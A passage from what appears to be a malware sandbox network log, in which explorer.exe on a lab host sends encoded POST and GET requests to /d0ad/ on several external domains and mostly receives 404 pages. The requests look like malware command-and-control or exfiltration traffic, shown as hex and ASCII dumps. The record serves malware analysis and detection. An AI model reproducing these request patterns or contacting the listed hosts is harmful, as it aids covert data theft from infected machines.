Oct 26, 2022 13:21:01.991621971 CEST	2132	OUT	Data Raw: 75 30 37 71 6b 69 6f 65 41 72 39 56 44 37 57 43 4e 6b 43 4f 4b 32 78 58 41 30 35 5f 4e 38 79 71 58 77 31 4d 4f 4b 39 6d 58 7a 68 4a 6a 61 51 61 6c 34 54 58 67 6f 58 42 33 79 56 6d 48 6a 6e 52 51 75 69 54 36 46 33 63 35 76 39 61 79 6d 6e 6c 46 6f Data Ascii: u07qkioeAr9VD7WCNkCOK2xXA05_N8yqXw1MOK9mXzhJjaQal4TXgoXB3yVmHjnRQuiT6F3c5v9aymnlFo8pbvjcBasyrhJjiSvotQ(0Z3k0x9caQUmHV2sL5LZtTcmUzXB1HB2Xy9Mtc4deayMVUfIHP9pyYUc1lmWNk5oVXUzr~_DLu_RpwF21(7Xw346oqv23wxu5iW0ZGgCQAAlxWudvhl(i7i~KJiu4ovXyN0pw6Cj8rv0
Oct 26, 2022 13:21:01.991808891 CEST	2134	OUT	Data Raw: 77 6e 28 41 4b 37 37 56 52 67 58 32 7e 54 63 36 50 2d 46 56 49 39 65 74 73 6e 37 53 61 5a 76 76 45 75 6a 50 30 50 43 34 48 6d 61 4b 6a 6e 4a 50 4d 71 6e 30 6e 51 71 5a 78 77 61 36 63 46 7e 6e 61 48 53 47 4a 76 57 2d 4a 7a 31 37 34 2d 4b 64 78 67 Data Ascii: wn(AK77VRgX2~Tc6P-FVI9etsn7SaZvvEujP0PC4HmaKjnJPMqn0nQqZxwa6cF~naHSGJvW-Jz174-KdxgrSkaIkwzbu5PDWIi3LYWCictUCEikfT-I8lkllj-bdipZ3lwA5qpqDfbCTWUlwn8tTTeuzE4sAhn4mfFPM7cqH4th9osHS4k9xfgHg83jeh-w2hMH0(Kb4YCTqys0zUODMZ10XxqYhStvgdBQ514~vCzelMGwCcks
Oct 26, 2022 13:21:01.992016077 CEST	2140	OUT	Data Raw: 71 48 56 6d 57 68 71 43 35 59 76 75 36 72 64 67 6c 6a 58 33 42 76 52 6f 71 30 6c 38 55 42 65 58 7e 56 73 54 59 48 6a 71 68 61 42 44 49 30 58 73 30 69 41 57 57 41 6d 69 77 64 7a 72 76 6c 66 63 4c 72 52 67 79 6b 48 62 64 30 38 41 69 6e 32 63 48 72 Data Ascii: qHVmWhqC5Yvu6rdgljX3BvRoq0l8UBeX~VsTYHjqhaBDI0Xs0iAWWAmiwdzrvlfcLrRgykHbd08Ain2cHr7AHSuX4QC_oI0jMPWpab0zFX2WbORfZ8kMagUT1NN6dJh8CujiZwULfP1cp0UdRJy0kmVy~8gSMb3v4rWJ7y9H2rcu38cH3eB9MmrTaRC8trXGLKbZH2e_rTT5F_uAn7jv0sFjr9iUBxS3RwRuwAbJtlleZb(cT7K
Oct 26, 2022 13:21:01.992144108 CEST	2148	OUT	Data Raw: 53 6f 38 4b 63 77 35 4b 77 64 6a 79 38 76 70 39 57 78 71 37 5a 73 53 50 30 35 53 43 67 56 6e 64 58 4b 55 37 70 4d 74 49 75 79 76 31 50 59 44 70 49 58 69 76 49 51 4f 69 57 37 64 66 31 45 77 4e 72 69 76 59 31 47 46 65 6c 50 7e 5f 4e 6a 70 43 68 6e Data Ascii: So8Kcw5Kwdjy8vp9Wxq7ZsSP05SCgVndXKU7pMtIuyv1PYDpIXivIQOiW7df1EwNrivY1GFelP~_NjpChnt7GmfqcuhROidtO7Eox9plXrvThv3kbjQfSvmEL_g2YKfyci5hKdA8Zn~mLqS0Hkp3ijg6xg2Zu79R4AYksm3tGmrNIDMe1oiUx-gBhf17H6YhkiLRA282zwwGJGNDzOJRqVzdTGzZOl(KGLZOJVj17gIPZPDbYTw
Oct 26, 2022 13:21:01.992300034 CEST	2149	OUT	Data Raw: 6b 6a 64 66 43 32 50 39 78 79 34 4a 56 4e 44 53 75 36 64 5a 45 4c 71 41 71 70 33 5f 62 4f 4a 4f 39 31 6d 56 32 52 4a 45 43 57 51 65 57 5a 6d 4c 36 51 51 5f 73 6b 37 54 7e 50 69 51 28 6d 73 36 4c 66 52 61 5a 6e 35 52 37 47 6f 58 56 79 47 31 5a 79 Data Ascii: kjdfC2P9xy4JVNDSu6dZELqAqp3_bOJO91mV2RJECWQeWZmL6QQ_sk7T~PiQ(ms6LfRaZn5R7GoXVyG1Zy0JA84kmwqLfwfoxvXpnEzYTg2ZunIl6GZ-ZOYT5tDrQf0ZDQFvTSueYg7S3NBupCoPDnr_NyV784Etn2X2~24uT86pp1AfAAkMisQ6T-5LyPmLQYzQVibSAXP4I34ABadPm4mj2ECCKan2jNxqOyxNnSOvjS(kW91
Oct 26, 2022 13:21:01.996449947 CEST	2150	IN	HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-c39653c x-version: c39653c x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 26 Oct 2022 11:21:01 GMT keep-alive: timeout=5 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please
Oct 26, 2022 13:21:01.996509075 CEST	2150	IN	Data Raw: 63 6f 6e 74 61 63 74 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: contact the site owner.</p> </div> </div></div></body></html>
Oct 26, 2022 13:21:02.002834082 CEST	2153	OUT	Data Raw: 36 66 69 32 38 6f 4b 54 32 48 31 54 52 69 37 46 74 64 77 39 72 75 79 46 44 70 33 52 7e 6b 47 39 61 57 38 33 64 53 73 45 67 34 67 7a 75 32 6a 39 54 61 6a 67 4e 75 6d 52 32 34 46 6b 79 46 6d 2d 76 6d 67 6f 5a 58 39 7a 78 68 5a 7a 68 46 74 71 69 58 Data Ascii: 6fi28oKT2H1TRi7Ftdw9ruyFDp3R~kG9aW83dSsEg4gzu2j9TajgNumR24FkyFm-vmgoZX9zxhZzhFtqiXeuyn72kaP1S5txalXAb6PNENDvupgZ66HLAm67mXg8pJESSp5DXHD8NXUi8PwVnIJTSCHyM_OnUy~vubKCNJUpu1yhOdwlAjSgl23PIxguukEz6wtbYp8BJVeYK5LR6LHl6cT4VliJRnO7UyGgeXM5hSjTQULwzJ0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
102	192.168.11.20	49947	76.223.105.230	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:04.009713888 CEST	2167	OUT	GET /d0ad/?hZ=5jUpdPs&jXu=HtWyrRohZK7c8fd1APLwWRwJtB7cGxmiY3g361wIUH2W8bW5L0CPXM6H8QPzIx/FgYOXceqeXuSZGo2tEZEI7T7kC34NLHSzSQ== HTTP/1.1 Host: www.christophersubala.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:21:04.025944948 CEST	2169	IN	HTTP/1.1 404 Not Found content-type: text/html;charset=utf-8 content-length: 964 vary: Accept-Encoding server: DPS/2.0.0-beta+sha-c39653c x-version: c39653c x-siteid: eu-central-1 set-cookie: dps_site_id=eu-central-1; path=/ date: Wed, 26 Oct 2022 11:21:04 GMT keep-alive: timeout=5 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 75 78 63 6f 72 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 63 73 73 2f 63 75 73 74 6f 6d 65 72 2d 63 6f 6d 70 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 65 72 72 6f 72 2d 69 6d 67 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 64 70 73 2f 69 6d 61 67 65 73 2f 34 30 34 5f 62 61 63 6b 67 72 6f 75 6e 64 2e 6a 70 67 22 3e 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 20 69 64 3d 22 65 72 72 6f 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 31 32 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 2d 69 63 6f 6e 20 74 65 78 74 2d 77 61 72 6e 69 6e 67 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 75 78 69 63 6f 6e 20 75 78 69 63 6f 6e 2d 61 6c 65 72 74 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 3e 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 20 28 34 30 34 20 65 72 72 6f 72 29 3c 2f 68 31 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6c 65 61 64 22 3e 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 77 68 61 74 20 79 6f 75 27 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 73 68 6f 75 6c 64 20 62 65 20 68 65 72 65 2c 20 70 6c 65 61 73 65 20 Data Ascii: <!DOCTYPE html><html><head> <title>404 Not Found</title> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link href="//img1.wsimg.com/dps/css/uxcore.css" rel="stylesheet"> <link href="//img1.wsimg.com/dps/css/customer-comp.css" rel="stylesheet"></head><body><div id="error-img"><img src="//img1.wsimg.com/dps/images/404_background.jpg"></div><div class="container text-center" id="error"> <div class="row"> <div class="col-md-12"> <div class="main-icon text-warning"><span class="uxicon uxicon-alert"></span></div> <h1>File not found (404 error)</h1> </div> </div> <div class="row"> <div class="col-md-6 col-md-push-3"> <p class="lead">If you think what you're looking for should be here, please
Oct 26, 2022 13:21:04.025955915 CEST	2169	IN	Data Raw: 63 6f 6e 74 61 63 74 20 74 68 65 20 73 69 74 65 20 6f 77 6e 65 72 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: contact the site owner.</p> </div> </div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
103	192.168.11.20	49948	198.252.105.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:09.350013018 CEST	2170	OUT	POST /d0ad/ HTTP/1.1 Host: www.legaldanaa.com Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.legaldanaa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.legaldanaa.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 74 55 70 30 73 55 58 37 54 51 35 71 32 4b 64 7a 39 68 74 63 4b 6f 51 79 58 33 55 6d 61 64 42 35 44 49 68 31 7a 75 4e 6d 6c 31 69 4c 77 63 30 58 6b 76 4a 54 73 63 51 77 31 54 6a 69 78 4e 36 33 4f 5a 42 45 4f 67 6e 75 6b 34 28 54 65 53 6b 77 69 61 67 7a 53 55 28 64 69 47 38 5a 68 47 32 35 4e 5a 4e 73 57 44 7a 58 61 6b 49 45 74 4a 4a 77 7e 6f 4f 61 50 73 70 4c 38 58 31 45 65 6c 61 31 33 74 65 55 66 6f 54 64 6f 47 65 56 47 74 50 51 34 6b 47 39 6f 53 66 6b 6e 2d 57 77 59 53 57 43 72 48 66 37 33 4f 63 5a 62 42 38 73 58 4e 65 52 6a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=tUp0sUX7TQ5q2Kdz9htcKoQyX3UmadB5DIh1zuNml1iLwc0XkvJTscQw1TjixN63OZBEOgnuk4(TeSkwiagzSU(diG8ZhG25NZNsWDzXakIEtJJw~oOaPspL8X1Eela13teUfoTdoGeVGtPQ4kG9oSfkn-WwYSWCrHf73OcZbB8sXNeRjg).
Oct 26, 2022 13:21:09.479736090 CEST	2171	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 26 Oct 2022 11:21:09 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
104	192.168.11.20	49949	198.252.105.91	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:21:11.502743959 CEST	2172	OUT	POST /d0ad/ HTTP/1.1 Host: www.legaldanaa.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.legaldanaa.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.legaldanaa.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 74 55 70 30 73 55 58 37 54 51 35 71 32 70 46 7a 78 69 56 63 50 49 51 78 4c 48 55 6d 41 74 42 39 44 49 6c 31 7a 76 4a 32 6c 67 53 4c 78 2d 38 58 6a 74 78 54 72 63 51 77 74 44 69 6f 73 64 36 73 4f 5a 4d 7a 4f 67 62 75 6b 34 72 54 59 78 73 77 31 61 67 77 4b 45 28 63 30 57 38 45 33 47 32 33 4e 5a 78 57 57 43 6e 58 61 55 30 45 73 50 31 77 70 4b 6d 62 59 63 70 42 7e 58 31 46 58 46 61 76 33 74 53 36 66 70 62 4e 70 77 7e 56 47 4f 48 51 32 45 47 2d 36 43 66 5f 34 4f 58 6b 4c 44 48 6e 71 46 6e 43 71 50 55 44 59 44 46 43 62 4d 28 70 7a 7a 4e 63 61 52 6c 65 41 50 4d 41 73 59 63 38 57 4c 4a 4c 4b 76 78 7a 44 51 78 42 53 74 39 48 65 41 49 58 65 6f 72 4f 58 64 6e 52 32 4f 66 39 39 4e 67 33 50 75 61 4a 43 55 37 7a 58 6b 70 46 7e 59 34 4a 6b 50 48 43 56 48 64 6f 6f 65 6c 72 6f 79 62 39 7e 43 64 34 6e 78 6b 6b 50 43 78 52 58 53 57 35 33 51 53 2d 56 34 68 65 71 67 52 31 5a 6f 42 54 77 37 4e 73 79 69 79 59 64 43 64 75 37 2d 6b 62 41 62 31 67 28 70 63 36 70 69 42 39 35 54 4d 5a 5a 52 68 44 73 30 30 31 54 4f 30 5a 78 43 61 68 62 34 41 49 49 73 43 51 55 75 39 68 43 37 61 73 52 6c 72 64 4e 49 49 59 57 5f 45 41 53 4d 7a 76 75 4e 50 41 75 52 64 36 4b 36 57 4b 6f 67 59 75 74 51 52 38 46 58 28 38 36 58 6a 6f 35 49 77 68 49 4d 42 61 70 58 30 71 41 41 4e 77 74 58 4e 79 70 63 43 46 79 6d 54 32 6e 6e 4d 30 5a 51 66 76 59 66 53 62 6a 62 45 71 33 64 78 6d 42 72 6a 56 77 32 63 43 72 45 4e 6f 30 6f 41 2d 57 70 4f 48 72 6c 31 77 39 51 6c 4a 69 78 5a 4e 32 73 6b 71 59 44 39 66 6d 6c 77 7a 66 41 61 58 75 56 30 6d 57 4c 6f 6f 7a 31 72 35 6c 2d 4e 6e 6c 65 55 6a 53 34 45 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=tUp0sUX7TQ5q2pFzxiVcPIQxLHUmAtB9DIl1zvJ2lgSLx-8XjtxTrcQwtDiosd6sOZMzOgbuk4rTYxsw1agwKE(c0W8E3G23NZxWWCnXaU0EsP1wpKmbYcpB~X1FXFav3tS6fpbNpw~VGOHQ2EG-6Cf_4OXkLDHnqFnCqPUDYDFCbM(pzzNcaRleAPMAsYc8WLJLKvxzDQxBSt9HeAIXeorOXdnR2Of99Ng3PuaJCU7zXkpF~Y4JkPHCVHdooelroyb9~Cd4nxkkPCxRXSW53QS-V4heqgR1ZoBTw7NsyiyYdCdu7-kbAb1g(pc6piB95TMZZRhDs001TO0ZxCahb4AIIsCQUu9hC7asRlrdNIIYW_EASMzvuNPAuRd6K6WKogYutQR8FX(86Xjo5IwhIMBapX0qAANwtXNypcCFymT2nnM0ZQfvYfSbjbEq3dxmBrjVw2cCrENo0oA-WpOHrl1w9QlJixZN2skqYD9fmlwzfAaXuV0mWLooz1r5l-NnleUjS4E.
Oct 26, 2022 13:21:11.632514954 CEST	2173	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Wed, 26 Oct 2022 11:21:11 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 